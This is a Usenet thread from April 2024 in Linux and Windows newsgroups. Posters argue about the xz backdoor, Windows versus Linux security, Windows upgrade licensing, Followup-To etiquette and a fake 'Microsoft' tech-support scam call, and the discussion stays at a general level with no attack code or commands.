    --- Synchronet 3.20a-Linux NewsLink 1.114
  • From Jukka Lahtinen@jtfjdehf@hotmail.com.invalid to alt.comp.os.windows-10,alt.os.linux on Mon Apr 1 22:14:17 2024
    From Newsgroup: alt.os.linux

    "Carlos E.R." <robin_listas@es.invalid> writes:

    Software is never done.

    It is, when the support ends.
    --
    Jukka Lahtinen
    --- Synchronet 3.20a-Linux NewsLink 1.114
  • From Newyana2@Newyana2@invalid.nospam to alt.comp.os.windows-10,alt.os.linux on Mon Apr 1 16:39:26 2024
    From Newsgroup: alt.os.linux

    "J.O. Aho" <user@example.net> wrote

    | There is less risk of using the compromised xz tarball than using your
    | current ms-windows

    You're getting more glib and adversarial with each post.
    The risks with Windows depend on a lot of things. As does
    the risk with anything. Computers are not hacked by pixies.
    They're hacked by people exploiting network communication
    methods that are inherently unsafe.

    If you don't want to deal with that directly then the best
    you can do is to allow the dripfeed updates, run anti-virus,
    minimize valuable data that you allow on your computer,
    like credit card numbers, and hope that some update doesn't
    break your system. If you're actually going to deal with
    security it's more complicated.


    --- Synchronet 3.20a-Linux NewsLink 1.114
  • From =?UTF-8?B?YmFk8J+SvXNlY3Rvcg==?=@forgetski@_INVALID.net to alt.os.linux on Tue Apr 2 01:37:10 2024
    From Newsgroup: alt.os.linux

    On 4/1/24 14:47, John Hasler wrote:
    badsector writes:
    when did Gates first call Linux a 'cancer'

    That was Ballmer. He was evidently terrified of Linux.

    I stand corrected, would not want to accuse Billy falsely but I think I
    will hold his nomination for sainthood :-)





    --- Synchronet 3.20a-Linux NewsLink 1.114
  • From Chris@ithinkiam@gmail.com to alt.comp.os.windows-10,alt.os.linux on Tue Apr 2 06:57:39 2024
    From Newsgroup: alt.os.linux

    Frank Slootweg <this@ddress.is.invalid> wrote:
    Chris <ithinkiam@gmail.com> wrote:
    On 01/04/2024 16:19, Frank Slootweg wrote:
    Chris <ithinkiam@gmail.com> wrote:
    On 31/03/2024 19:17, Newyana2 wrote:
    [...]

    [About Apple:]

    quickly dropping
    support for older products.

    Which from a security standpoint works very well. Apple long ago stopped >>>> selling OS updates - which Microsoft still kinda does - as it made sense >>>> to have as many users as possible on the latest and most up-to-date OS >>>> version.

    Maybe you can still buy some Microsoft Windows upgrades for some niche
    corner cases, but effectively all Windows upgrades have been free, ever
    since Windows 7 (2009!), till today (Windows 11).

    I thought the upgrade to 10 from 7/8 was only free for a while? It also
    certainly wasn't "transparent" upgrade.

    Yes, Microsoft has been sending mixed messages about this and there
    may have been gaps when the previous free period was over and the next
    free period was not yet there. After all, one can't use Microsoft and consistent in one sentence, can one!? :-) Anyway, my wife's 8.1 to 10
    upgrade was done in March 2023, nearly 8 years after release of 10, and
    was free.

    Interesting. That's not the message I've seen over recent years.

    Of course you can still buy full licenses, for systems which come
    without one, but those are not upgrades.

    Although, anyone can use Win10 for free as long as they ignore the
    subtle 'nag' from MS. No idea why they still charge so much for Windows.
    Maybe it's so they can justify the costs to OEMs?

    I only bought Windows 1.0 (the 386 version), never since.

    I've used Windows off and on since 3.1 which came with my first PC, but
    only ever bought Win10. I used a pirate version of win98 for a long time
    and then linux until I made a gaming rig.

    I think my next home computer will be a mac. I'll consider this when win10
    goes out of support next year.
    --- Synchronet 3.20a-Linux NewsLink 1.114
  • From Paul@nospam@needed.invalid to alt.os.linux on Tue Apr 2 03:56:35 2024
    From Newsgroup: alt.os.linux

    On 4/1/2024 10:40 AM, candycanearter07 wrote:
    ["Followup-To:" header set to alt.os.linux.]
    Larry Wolff <larrywolff@larrywolff.net> wrote at 09:05 this Monday (GMT):
    On 3/31/2024 2:11 PM, Lew Pitcher wrote:
    [snip]
    Vegard Nossum wrote a script to detect if it's likely that the ssh binary
    on a
    system is vulnerable, attached here. Thanks!


    Greetings,

    Andres Freund

    View attachment "injected.txt" of type "text/plain" (8236 bytes)

    Download attachment "liblzma_la-crc64-fast.o.gz" of type "application/gzip" >> (36487 bytes)

    Download attachment "detect.sh" of type "application/x-sh" (426 bytes)
    Powered by blists - more mailing lists

    Please check out the Open Source Software Security Wiki, which is
    counterpart to this mailing list.

    Confused about mailing lists and their use? Read about mailing lists on
    Wikipedia and check out these guidelines on proper formatting of your


    Hi, the server I am using strips binaries. Would it be possible to
    provide a link?


    Maybe the confusing stuff you were reading, was referring
    to attachments on a page like this ?

    https://seclists.org/oss-sec/2024/q1/301

    For example, check out the attachments at the bottom of this message.

    https://seclists.org/oss-sec/2024/q1/268

    Paul
    --- Synchronet 3.20a-Linux NewsLink 1.114
  • From J.O. Aho@user@example.net to alt.comp.os.windows-10,alt.os.linux on Tue Apr 2 10:40:21 2024
    From Newsgroup: alt.os.linux

    On 01/04/2024 22.39, Newyana2 wrote:
    "J.O. Aho" <user@example.net> wrote

    | There is less risk of using the compromised xz tarball than using your
    | current ms-windows

    You're getting more glib and adversarial with each post.
    The risks with Windows depend on a lot of things. As does
    the risk with anything. Computers are not hacked by pixies.

    Then I guess you missed the windows metafile image code execution
    (MICE), so you could say you get hacked by a pixel, no matter if it's
    your mail client, your browser of a image you got from a friend on an
    usb stick that you take a look in windows picture.


    They're hacked by people exploiting network communication
    methods that are inherently unsafe.

    You know your browser and your mail client are your weakest points, no
    matter if the communication is encrypted or not.


    If you don't want to deal with that directly then the best
    you can do is to allow the dripfeed updates, run anti-virus,
    minimize valuable data that you allow on your computer,
    like credit card numbers, and hope that some update doesn't
    break your system.

    I understand that you are reluctant to update for you are afraid that
    things will break, that caused by the bad QA checking done by a specific company, but instead of using something better you keep on hanging
    around with a old install that hasn't been updated as it's EOL, harming
    the rest of us with your vulnerabilities. Have you fixed CVE-2008-5424
    and CVE-2010-3147 yet?


    If you're actually going to deal with
    security it's more complicated.

    Yes, it is complicated and you need to be able to analyze the source
    code of all programs you run, even the BIOS and OS, if you running a
    somewhat modern CPU you would need the access to the source code of the
    minix that is running on the CPU. Don't forget the same thing applies to
    your other devices like firewall. Don't forget that you should compile everything from the source you have analyzed and deemed as safe, each
    time there is a security patch you should analyze it and decide if
    applying it to your code and then recompile the application and all that depends on it in a static manner.

    It's a quite a lot of work and not all have the skill to do so and then
    there is the problem that you don't have access to all the source code,
    so you have to trust on others judgment and as they also are humans,
    they too can make mistakes and that's why all code has bugs.
    --
    //Aho




    --- Synchronet 3.20a-Linux NewsLink 1.114
  • From Carlos E.R.@robin_listas@es.invalid to alt.comp.os.windows-10,alt.os.linux on Tue Apr 2 14:49:22 2024
    From Newsgroup: alt.os.linux

    On 2024-04-01 20:36, Frank Slootweg wrote:
    Although, anyone can use Win10 for free as long as they ignore the
    subtle 'nag' from MS. No idea why they still charge so much for Windows.
    Maybe it's so they can justify the costs to OEMs?
    I only bought Windows 1.0 (the 386 version), never since.

    I have bought Windows 10 and 11.

    When I buy laptops for me or for other people, there is an item in the
    invoice that says "Windows". You can refuse, and that money is discounted.
    --
    Cheers, Carlos.

    --- Synchronet 3.20a-Linux NewsLink 1.114
  • From Carlos E.R.@robin_listas@es.invalid to alt.comp.os.windows-10,alt.os.linux on Tue Apr 2 16:19:14 2024
    From Newsgroup: alt.os.linux

    On 2024-04-01 20:06, Frank Slootweg wrote:
    candycanearter07 <candycanearter07@candycanearter07.nomail.afraid> wrote:
    Frank Slootweg <this@ddress.is.invalid> wrote at 15:48 this Monday (GMT): >>> candycanearter07 <candycanearter07@candycanearter07.nomail.afraid> wrote: >>>> ["Followup-To:" header set to alt.os.linux.]

    Ignored, because this is about Windows. (Not to mention that
    'Followup-To:' is nearly always inappropriate.)

    I've been told the opposite..

    That's another wrong thing you've been told! :-)

    I won't go in all the situations where it's wrong, but will just take
    this example.

    If I had honoured your 'Followup-To:', I would not see any responses,
    i.e. also not any responses to *my own* response (which is, as I said,
    about Windows, *not* Linux), because I'm not subscribed to alt.os.linux.

    So you were effectively forcing me - *and* any other user who is not subscribed to alt.os.linux - to subscribe, just because you think it's
    the good thing to do.

    I hope you realize how inconsiderate and rude that is.

    Also a 'Followup-To: alt.comp.os.windows-10' would have been inappropriate, because you cut off any subscribers of alt.os.linux, who
    might be interested in further responses.

    Bottom line: Do *not* use 'Followup-To:'.

    [...]

    Absolutely.
    --
    Cheers, Carlos.

    --- Synchronet 3.20a-Linux NewsLink 1.114
  • From candycanearter07@candycanearter07@candycanearter07.nomail.afraid to alt.os.linux on Tue Apr 2 15:10:11 2024
    From Newsgroup: alt.os.linux

    Paul <nospam@needed.invalid> wrote at 07:56 this Tuesday (GMT):
    On 4/1/2024 10:40 AM, candycanearter07 wrote:
    ["Followup-To:" header set to alt.os.linux.]
    Larry Wolff <larrywolff@larrywolff.net> wrote at 09:05 this Monday (GMT): >>> On 3/31/2024 2:11 PM, Lew Pitcher wrote:
    [snip]
    Vegard Nossum wrote a script to detect if it's likely that the ssh binary >>> on a
    system is vulnerable, attached here. Thanks!


    Greetings,

    Andres Freund

    View attachment "injected.txt" of type "text/plain" (8236 bytes)

    Download attachment "liblzma_la-crc64-fast.o.gz" of type "application/gzip" >>> (36487 bytes)

    Download attachment "detect.sh" of type "application/x-sh" (426 bytes)
    Powered by blists - more mailing lists

    Please check out the Open Source Software Security Wiki, which is
    counterpart to this mailing list.

    Confused about mailing lists and their use? Read about mailing lists on
    Wikipedia and check out these guidelines on proper formatting of your


    Hi, the server I am using strips binaries. Would it be possible to
    provide a link?


    Maybe the confusing stuff you were reading, was referring
    to attachments on a page like this ?

    https://seclists.org/oss-sec/2024/q1/301

    For example, check out the attachments at the bottom of this message.

    https://seclists.org/oss-sec/2024/q1/268

    Paul


    Hi, I'm reading this from an NNTP server. Thanks for the link, though!
    --
    user <candycane> is generated from /dev/urandom
    --- Synchronet 3.20a-Linux NewsLink 1.114
  • From Paul@nospam@needed.invalid to alt.comp.os.windows-10,alt.os.linux on Tue Apr 2 15:29:09 2024
    From Newsgroup: alt.os.linux

    On 4/2/2024 2:57 AM, Chris wrote:

    I've used Windows off and on since 3.1 which came with my first PC, but
    only ever bought Win10. I used a pirate version of win98 for a long time
    and then linux until I made a gaming rig.

    I think my next home computer will be a mac. I'll consider this when win10 goes out of support next year.

    How horrible :-) Sorry for your loss.

    I have three Macs in the computer room.
    But, I got off the treadmill, I went cold and sober.

    And here I am today :-)

    I can't go into an Apple Bar, for fear of falling off the wagon.

    The Apple computers are important. Other computers
    are piled on top of them, and they make "great bases"
    for computer stacks :-)

    Now, what I want, is a computer with a single 40Gbit/sec connector,
    when I'm trying to connect... a keyboard. That's my idea of convenience.

    Paul
    --- Synchronet 3.20a-Linux NewsLink 1.114
  • From =?UTF-8?B?Li4ud8Khw7HCp8KxwqTDsQ==?=@winstonmvp@gmail.com to alt.comp.os.windows-10,alt.os.linux on Tue Apr 2 13:03:20 2024
    From Newsgroup: alt.os.linux

    On 4/1/24 11:06 AM, Frank Slootweg wrote:
    candycanearter07 <candycanearter07@candycanearter07.nomail.afraid> wrote:
    Frank Slootweg <this@ddress.is.invalid> wrote at 15:48 this Monday (GMT): >>> candycanearter07 <candycanearter07@candycanearter07.nomail.afraid> wrote: >>>> ["Followup-To:" header set to alt.os.linux.]

    Ignored, because this is about Windows. (Not to mention that
    'Followup-To:' is nearly always inappropriate.)

    I've been told the opposite..

    That's another wrong thing you've been told! :-)

    I won't go in all the situations where it's wrong, but will just take
    this example.

    If I had honoured your 'Followup-To:', I would not see any responses,
    i.e. also not any responses to *my own* response (which is, as I said,
    about Windows, *not* Linux), because I'm not subscribed to alt.os.linux.

    So you were effectively forcing me - *and* any other user who is not subscribed to alt.os.linux - to subscribe, just because you think it's
    the good thing to do.

    I hope you realize how inconsiderate and rude that is.

    Also a 'Followup-To: alt.comp.os.windows-10' would have been inappropriate, because you cut off any subscribers of alt.os.linux, who
    might be interested in further responses.

    Bottom line: Do *not* use 'Followup-To:'.

    [...]
    Not to be confused with Thunderbird's - select
    message/rt.click/'Followup to Newsgroup' which yields the same as the
    'Reply' icon(in news mode when Reply is added to the 'Menu Bar')
    both reply to the 'To" newsgroup(s)

    ...and unlike the message pane options(Reply icon, which replies to
    sender's email) or Followup icon/Followup-To option
    --
    ...w¡ñ§±¤ñ

    --- Synchronet 3.20a-Linux NewsLink 1.114
  • From Paul@nospam@needed.invalid to alt.comp.os.windows-10,alt.os.linux on Tue Apr 2 20:26:19 2024
    From Newsgroup: alt.os.linux

    On 4/1/2024 4:39 PM, Newyana2 wrote:
    "J.O. Aho" <user@example.net> wrote

    | There is less risk of using the compromised xz tarball than using your
    | current ms-windows

    You're getting more glib and adversarial with each post.
    The risks with Windows depend on a lot of things. As does
    the risk with anything. Computers are not hacked by pixies.
    They're hacked by people exploiting network communication
    methods that are inherently unsafe.

    If you don't want to deal with that directly then the best
    you can do is to allow the dripfeed updates, run anti-virus,
    minimize valuable data that you allow on your computer,
    like credit card numbers, and hope that some update doesn't
    break your system. If you're actually going to deal with
    security it's more complicated.



    Both ecosystems have had supply chain attacks. There
    was also an attack carried out by a local university, for
    which Linus assigned a "permaban" on their kernel submissions.
    That was an attack on kernel.org . Whereas the XZ one is
    a more general Linux one, a test of how well the system
    responds to shenanigans.

    Windows 11 shows an "Extract from" if I highlight an XZ file.
    It would appear the Insider development, is already in
    the Release stream. All my instances of XZ are .tar.xz .

    https://www.makeuseof.com/enable-archive-support-windows-11/

    TXZ <=== hmmm
    RAR
    7Z <=== likely single-threaded extract, when 7z.exe does multi-core extract
    TAR
    TAR.GZ
    TAR.BZ2
    TAR.ZS <=== ZSTD support ? ( .zst )
    TAR.XZ <=== hmmm
    TGZ
    TBZ2
    TZST

    In the past there was ZIPfldr.dll and CABExtract.dll and
    you could unregsrv them to prevent them from operating.

    I open most archive formats with 7ZIP, so Extract is not
    something I would normally do.

    Due to the JPG and TIF library issues long ago, both
    Microsoft and Apple are supposed to carry out source code
    reviews on "foreign" libraries. And they would have an
    opportunity to raise an alarm, as the developer in the
    news did. That's if they were actually reading the
    above example source.

    On Win11, the file might be "archiveint.dll" that supports the new archives. Properties Text string "Windows internal libarchive library". 1.35MB
    Date 1/9/2024.

    Paul

    --- Synchronet 3.20a-Linux NewsLink 1.114
  • From Chris@ithinkiam@gmail.com to alt.comp.os.windows-10,alt.os.linux on Wed Apr 3 07:21:36 2024
    From Newsgroup: alt.os.linux

    Paul <nospam@needed.invalid> wrote:
    On 4/2/2024 2:57 AM, Chris wrote:

    I've used Windows off and on since 3.1 which came with my first PC, but
    only ever bought Win10. I used a pirate version of win98 for a long time
    and then linux until I made a gaming rig.

    I think my next home computer will be a mac. I'll consider this when win10 >> goes out of support next year.

    How horrible :-) Sorry for your loss.

    I use a mac for work and have done for over a decade. I just don't find
    windows to be a pleasant experience.

    I have three Macs in the computer room.
    But, I got off the treadmill, I went cold and sober.

    And here I am today :-)

    I can't go into an Apple Bar, for fear of falling off the wagon.

    The Apple computers are important. Other computers
    are piled on top of them, and they make "great bases"
    for computer stacks :-)

    Now, what I want, is a computer with a single 40Gbit/sec connector,
    when I'm trying to connect... a keyboard. That's my idea of convenience.

    Paul




    --- Synchronet 3.20a-Linux NewsLink 1.114
  • From Newyana2@Newyana2@invalid.nospam to alt.comp.os.windows-10,alt.os.linux on Wed Apr 3 08:41:54 2024
    From Newsgroup: alt.os.linux

    "Paul" <nospam@needed.invalid> wrote

    | Both ecosystems have had supply chain attacks. There
    | was also an attack carried out by a local university, for
    | which Linus assigned a "permaban" on their kernel submissions.
    | That was an attack on kernel.org . Whereas the XZ one is
    | a more general Linux one, a test of how well the system
    | responds to shenanigans.
    |
    | Windows 11 shows an "Extract from" if I highlight an XZ file.
    | It would appear the Insider development, is already in
    | the Release stream. All my instances of XZ are .tar.xz .
    |

    You have XZ files on Windows?

    ...To my mind this is all a classic
    case of placing the blame in the wrong place. Clearly it's a
    problem is someone comes up with a hack of remote access
    software. But the real problem is that software itself. Something
    like SSH shouldn't be in use. Remote Desktop shouldn't be
    in use. People just can't even imagine using a computer safely.
    We want all the convenience and none of the risk. That's not
    going to happen. So instead of opting for sensible security people
    throw caution to the wind and then they're shocked to learn
    that a hack has happened. Hacks are happening almost daily.
    They're professional and borderline-military now. Yet people
    shop and bank online, call home to check their security camera,
    let Amazon store their credit card number... all while having
    remote access enabled and not restricting javascript.

    Some years ago my starving artist brother called me. He was
    in a panic, explaining the "Microsoft" had called him to warn that
    there could be repercussions because my brother had not paid his
    Windows bill for several years. He didn't know that he was
    supposed to. Had the bill been lost in the mail? Was Microsoft going
    to sue him? The caller walked him through enabling remote access
    and had him download a file. Then he took over the Desktop to
    show my brother what they could do if he didn't pay. He was
    horrified. They'd got him to download a remote desktop program,
    but he didn't understand that. Luckily they were only using it
    to scare him. My brother got through it unscathed for one reason
    alone: He was flat broke and had never had a credit card, so he
    couldn't pay. :)


    --- Synchronet 3.20a-Linux NewsLink 1.114
  • From J.O. Aho@user@example.net to alt.comp.os.windows-10,alt.os.linux on Wed Apr 3 16:18:31 2024
    From Newsgroup: alt.os.linux

    On 03/04/2024 14.41, Newyana2 wrote:
    "Paul" <nospam@needed.invalid> wrote

    | Both ecosystems have had supply chain attacks. There | was also an
    attack carried out by a local university, for | which Linus assigned
    a "permaban" on their kernel submissions. | That was an attack on
    kernel.org . Whereas the XZ one is | a more general Linux one, a test
    of how well the system | responds to shenanigans. | | Windows 11
    shows an "Extract from" if I highlight an XZ file. | It would appear
    the Insider development, is already in | the Release stream. All my
    instances of XZ are .tar.xz . |

    You have XZ files on Windows?

    Yes, and you have sshd too, that you need of course enable yourself if
    you intend to use it. So you have all the tools needed for this hack,
    except you lack the systemd part as do all Unix variants and a number of
    Linux distributions.

    Things evolve, with the amount of work they are putting on WSL you
    shouldn't be surprised that next version of microsoft windows may
    actually run on a Linux kernel with an api wrapper to allow you to run
    old windows applications. There was a talk about this already during
    Balmer's time, you can guess who wasn't happy about the idea.


    ...To my mind this is all a classic case of placing the blame in the
    wrong place. Clearly it's a problem is someone comes up with a hack
    of remote access software. But the real problem is that software
    itself. Something like SSH shouldn't be in use. Remote Desktop shouldn't be > in use. People just can't even imagine using a computer safely.

    The major danger for desktop users ain't ssh nor rdp, but the web
    browser and mail client for those who don't use a web based mail
    service, so yet again hinting about CVE-2008-5424, CVE-2010-3147, and
    MICE issues on your computer.

    On corporate systems you need to be able to remote access them as it
    would take hours just to upgrade a few computers if you need to get down
    to the data center and then login to each machine locally and do the
    update. Sure you shouldn't let the endpoints be accessible directly on
    the internet.


    Some years ago my starving artist brother called me. He was in a
    panic, explaining the "Microsoft" had called him to warn that there
    could be repercussions because my brother had not paid his Windows
    bill for several years.

    This kind of scams been around for a long time, "Hi, this is Microsoft calling..." even I have had those calls, quite fun you can have with the Indian guy on the other side.
    It's amazing people still get caught in them... but that is how things
    goes when people don't care to learn about the things they use.



    --- Synchronet 3.20a-Linux NewsLink 1.114
  • From Jasen Betts@usenet@revmaps.no-ip.org to alt.comp.os.windows-10,alt.os.linux on Wed Apr 3 23:41:17 2024
    From Newsgroup: alt.os.linux

    On 2024-04-01, Bugsy <bugsy@zimage.comBUGSY> wrote:
    "Carlos E.R." <robin_listas@es.invalid> wrote:

    Bad actor probably paid by some country or mafia with money and resources. >>
    https://lcamtuf.substack.com/p/technologist-vs-spy-the-xz-backdoor

    Very sophisticated. Their grand scheme was:

    1) sneakily backdoor the release tarballs, but not the source code

    Almost 40 years ago ACM published Ken Thompson's article "Reflections on Trusting Trust" this explit seems similar to his compiler exploit.
    (trees died for this to be published, here is a scan: https://dl.acm.org/doi/pdf/10.1145/358198.358210 )
    --
    Jasen.
    🇺🇦 Слава Україні
    --- Synchronet 3.20a-Linux NewsLink 1.114
  • From Carlos E.R.@robin_listas@es.invalid to alt.comp.os.windows-10,alt.os.linux on Thu Apr 4 14:28:08 2024
    From Newsgroup: alt.os.linux

    On 2024-04-01 18:02, Gelato wrote:
    On Mon, 1 Apr 2024 15:20:35 +0200, Carlos E.R. wrote:

    Bad actor probably paid by some country or mafia with money and resources. >>>>
    https://lcamtuf.substack.com/p/technologist-vs-spy-the-xz-backdoor

    Very sophisticated. Their grand scheme was:

    1) sneakily backdoor the release tarballs, but not the source code

    Wrong. The source code of xz was compromised.

    Read that reference again, and read the other references. https://lcamtuf.substack.com/p/technologist-vs-spy-the-xz-backdoor

    It was sneaky. Very sneaky.
    It wasn't in the source code.

    It was in the packaging/testing code. https://doublepulsar.com/inside-the-failed-attempt-to-backdoor-ssh-globally-that-got-caught-by-chance-bbfe628fafdd
    "The upstream xz repository and the xz tarballs have been backdoored."

    Ok, but it was not a binary, the distributions do not accept binaries.
    The tarballs contain the released source code that distributions
    download to build their own binaries.

    I recogn I get a headache trying to understand it all.
    --
    Cheers, Carlos.

    --- Synchronet 3.20a-Linux NewsLink 1.114